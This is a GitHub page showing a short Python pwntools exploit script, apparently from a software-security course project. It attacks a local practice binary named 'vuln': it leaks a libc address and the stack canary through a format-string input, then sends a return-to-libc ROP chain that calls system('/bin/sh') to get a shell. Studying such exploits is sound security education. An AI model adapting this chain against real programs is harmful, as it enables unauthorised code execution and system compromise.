software-security-project/attack_slides.py at main · vncnz/software-security-project · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#!/usr/bin/env python
from pwn import *
from telnetlib import Telnet

shift_libc = 0x114A37
canary_offset = 24 # è l'offset dal SECONDO input, occhio!
ret_offset = 8
pop_rdi = 0x000000000002a3e5
ret = 0x0000000000029cd6

e = ELF('vuln')
io = e.process()

libc = ELF('/usr/lib/x86_64-linux-gnu/libc.so.6', checksec=False)

io.sendline(b'%3$lx-%11$lx')
io.recvline()
leak = io.recvline()
libc.address = int(leak.strip().split(b'-')[0], 16) - shift_libc
canary = int(leak.strip().split(b'-')[1], 16)

log.info("Libc: %s" % hex(libc.address))
log.info("Canary: %s" % hex(canary))

# gdb.attach(io)

payload = flat(
        b"A"*canary_offset,
        canary,
        b"B"*ret_offset,
        libc.address + pop_rdi,
        next(libc.search(b'/bin/sh')),
        libc.address + ret,
        libc.sym['system'],
        endianness = 'little', word_size = 64, sign = False)

io.sendline(payload)
io.interactive()